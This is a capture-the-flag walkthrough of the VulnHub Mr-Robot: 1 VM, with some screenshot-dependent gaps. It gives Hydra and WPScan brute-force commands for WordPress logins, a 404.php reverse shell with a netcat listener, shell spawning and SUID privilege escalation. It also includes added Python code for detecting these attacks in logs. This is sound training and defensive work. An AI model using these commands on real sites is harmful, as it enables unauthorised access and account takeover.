Hello world! Today I'll be detailing the steps I took to hack VulnHub's Mr-Robot: 1 VM, created by Leon Johnson. The VM has three keys hidden in different locations and my goal is to find all three.
I'll be using a Kali Linux VM to attack Mr-Robot: 1, which we will refer to as "target" throughout the write-up. Both machines are set up in Oracle VM VirtualBox and their network adapters are set to Host-only.
Let's start hacking!
First we will need to do a little reconnaissance, so let's start with figuring out our target's IP address.
With our IP being 192.168.56.104, we perform a network scan of the full range of IPs to find our target's address with the following command:
nmap -oX nmap_scan.xml 192.168.56.0/24
After a quick check of each IP in the nmap report, we see our target is on
There are tools like dirb that we can use to recon any potential subdirectories of the main host address, but this method is exhaustive and can take some time. To be efficient with our time, let's manually check some common subdirectories and see if we can get a lead:
...rude that it's not willing to help us with the hack.
...hmmm, doesn't look like we can get in. Noting the error message, it's shown because of an invalid username. So if we enter the correct username, would it prompt us with "Invalid password" instead? 👀
We'll circle back to the WP login later...
...and luckily enough, there's key-1-of-3.txt, our 1st key! ✅
As we saw earlier, there is a WP site we can try logging into, but of course, we can't log in without the right username and password.
Using WPScan, we can try to find any valid users:
...but from the looks of it, nothing substantial, except maybe the WordPress version, which seems exploitable.
...that we can use for possible username and password combinations!
There are a few tools that we can use to brute force the WP login:
...and if we use fsocity.dic as the wordlist for the cracking tool, it's going to take a long while to brute force 858,160 potential username/password combos.
If we remove any duplicates and sort the wordlist, we could optimize the time it would take to brute force (TL;DR: shorter list, faster time to crack):
sort fsocity.dic | uniq > sorted_uniq_fsocity.dic
Looking at the length of each response, most are pretty consistent when erroring out, but scrolling not too far down to Elliot, we see the response length is 4164 instead of the usual 4114. In the rendered response, the error message says that the password entered for Elliot is incorrect, which, given our earlier observation about error messages, leads us to conclude that Elliot is a valid user.
If we had used the sorted list, it ideally would've shortened the brute-force execution time. However, because it's also sorted, it could take longer to see the target response, especially if the right credential is last in the wordlist.
Considering how long it might take to brute force the password with Burp Suite (since this is the Community version of Burp), we'll move on to another tool, Hydra.
Using Hydra, we're able to brute force a valid username, using the original fsocity.dic and an arbitrary password:
hydra -V -L ./fsocity.dic -p test 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:Invalid username"
Again, it was fairly quick since the username Elliot was right near the top. But if we had used the sorted, unique version of fsocity.dic, it would've taken up to attempt 11,452 to get the username:
With the username found, we can now brute force the password for elliot, and here we'll use the duplicate-removed, sorted version of our wordlist:
hydra -V -l elliot -P ./sorted_uniq_fsocity.dic 192.168.56.103 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.103%2Fwp-admin%2F&testcookie=1:incorrect"
Note that with WPScan, since we were unable to enumerate any valid users with our preliminary scan, we have to rely on the previously mentioned tools (Burp and Hydra) to find the username first.
Once found, we can then use WPScan as an alternative to brute force the password like so:
wpscan -t 10000 -U Elliot -P fsocity.dic --url http://192.168.56.103/
So of the three tools, Hydra was the best fit, with its quick execution time for this particular machine config. If circumstances were different, maybe with users enumerated or with the full Burp Suite version, the other tools would've been better for the job.
Our next move is to see if we can run the reverse shell from pentestmonkey by inserting it into the 404.php file of the WP site.
We'll need to switch the network back to Bridged Adapter in order to download the reverse shell, and then switch back to Host-only Adapter to reconnect with the target.
To download the reverse shell onto the Kali machine:
Using Netcat, we set up a listener on port 4242 with the command:
nc -lnvp 4242
Open a new terminal:
# This sends a POST request to the 404.php page, which runs the injected shell
curl -X POST http://192.168.56.103/404.php
We can also send the request from a web browser by visiting http://192.168.56.103/flaskdjhflakjsdhf. This will serve the 404 page, and therefore the request will trigger the reverse shell.
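From the defender's side, both web-facing steps above (the wp-login.php password spray and the POST to the 404 page) leave a clear trail in the web server's access log. The following Python detection is an added example, not part of the original write-up; the log lines are constructed in the combined log format, and the threshold and window are assumptions to tune per site.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

LOG_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def parse_line(line):
    """Return the fields of one combined-format (Apache/nginx) access-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec

def wp_login_bruteforce(lines, threshold=10, window=timedelta(minutes=1)):
    """IPs that POST to /wp-login.php more than `threshold` times inside any `window`."""
    posts = defaultdict(list)
    for rec in filter(None, map(parse_line, lines)):
        if rec["method"] == "POST" and rec["path"].startswith("/wp-login.php"):
            posts[rec["ip"]].append(rec["ts"])
    flagged = set()
    for ip, times in posts.items():
        times.sort()
        start = 0                                  # left edge of the sliding window
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            if end - start + 1 > threshold:
                flagged.add(ip)
                break
    return flagged

def suspicious_404_posts(lines):
    """POSTs that land on the 404 handler: a POST to 404.php or any POST answered with 404."""
    return [(r["ip"], r["path"], r["status"]) for r in filter(None, map(parse_line, lines))
            if r["method"] == "POST" and (r["path"].endswith("404.php") or r["status"] == 404)]

# Constructed sample log (not from the VM): a one-minute wp-login spray, a benign visitor, a POST to the 404 page.
SAMPLE_LOG = [
    f'192.168.56.104 - - [10/Oct/2023:13:55:{s:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"'
    for s in range(0, 60, 5)
] + [
    '192.168.56.50 - - [10/Oct/2023:13:55:40 +0000] "GET /wp-login.php HTTP/1.1" 200 4114 "-" "Mozilla/5.0"',
    '192.168.56.50 - - [10/Oct/2023:13:55:41 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.168.56.104 - - [10/Oct/2023:13:57:01 +0000] "POST /404.php HTTP/1.1" 404 0 "-" "curl/8.0.1"',
]
```

The constant 4114/4164 response sizes in the log also show the same username oracle Burp exposed, so alerting on a run of identical-size POST failures from one source is a cheap additional rule.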
Now we want interactive control over the target, so let's run
python -c "import pty; pty.spawn('/bin/bash')"
Now that we have our "shell in a shell", let's literally "find" the 2nd key, assuming it is in the same format as the 1st one:
find / -name "key-2-of-3.txt"
We navigate to our target directory /home/robot. Once there, we do an ls -l and confirm the 2nd key. Then we try to cat it to double-check, but it looks like our current privileges don't allow us to access that file.
When we cat it, it looks like an MD5 hash, which was obviously not hinted at by the file name.
So let's see if we can crack it by sending it to our good friend CrackStation.
Considering the context clues of the password.raw-md5 file name and its contents, we've just found the password for the robot user.
Thinking of next steps, it logically makes sense to escalate privileges, either up or across to other users who have access to files we don't (as we did when we escalated to robot from daemon@linux in the shell). We'll need to find any files with the SUID permission set that we can exploit.
We can run the following to do just that:
find / -perm /4000 -type f 2>/tmp/2
On GTFOBins, it looks like nmap is a Unix binary we can exploit to escalate our privileges. As detailed on the site, we'll need to run the following commands to spawn an interactive system shell:
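As an added, defender-side counterpart to the SUID hunt above (example code, not from the original write-up): a Python audit that enumerates setuid files the way find / -perm /4000 -type f does and diffs them against an allowlist, so an odd entry like a setuid nmap stands out. The allowlist and the throwaway test tree in self_check are constructed for this example; a real baseline comes from a clean image of the same build.

```python
import os
import stat
import tempfile

# Constructed allowlist of setuid binaries expected on a minimal Debian-style host.
EXPECTED_SUID = {"/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh",
                 "/usr/bin/chfn", "/usr/bin/newgrp", "/usr/bin/gpasswd", "/usr/bin/mount",
                 "/usr/bin/umount"}
PSEUDO_FS = ("/proc", "/sys", "/dev", "/run")

def find_suid(root="/"):
    """Equivalent of `find / -perm /4000 -type f`: regular files with the setuid bit set."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # do not descend into kernel pseudo-filesystems
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in PSEUDO_FS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)   # lstat: a symlink to a setuid file is not itself setuid
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)

def unexpected_suid(found, baseline=EXPECTED_SUID):
    """Setuid files absent from the baseline: the candidates to review against GTFOBins."""
    return sorted(set(found) - set(baseline))

def self_check():
    """Build a throwaway tree with one setuid file and one plain file; return what the audit flags."""
    with tempfile.TemporaryDirectory() as root:
        bindir = os.path.join(root, "usr", "local", "bin")
        os.makedirs(bindir)
        for name, mode in (("nmap", 0o4755), ("ls", 0o755)):
            path = os.path.join(bindir, name)
            open(path, "w").close()
            os.chmod(path, mode)
        flagged = unexpected_suid(find_suid(root), set())
        return [os.path.relpath(p, root) for p in flagged]

if __name__ == "__main__":
    print(self_check())                                  # ['usr/local/bin/nmap']
    print(unexpected_suid(find_suid("/")))               # live audit of this host
```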
Overall, this was a fun challenge for my first exercise in cybersecurity. I was focused on exploring different approaches to find each key, so I can be more aware of my toolkit and future methodology. It was definitely not quick to finish the CTF, but I learned a lot in doing so.
Until the next time, happy hacking! ✌🏻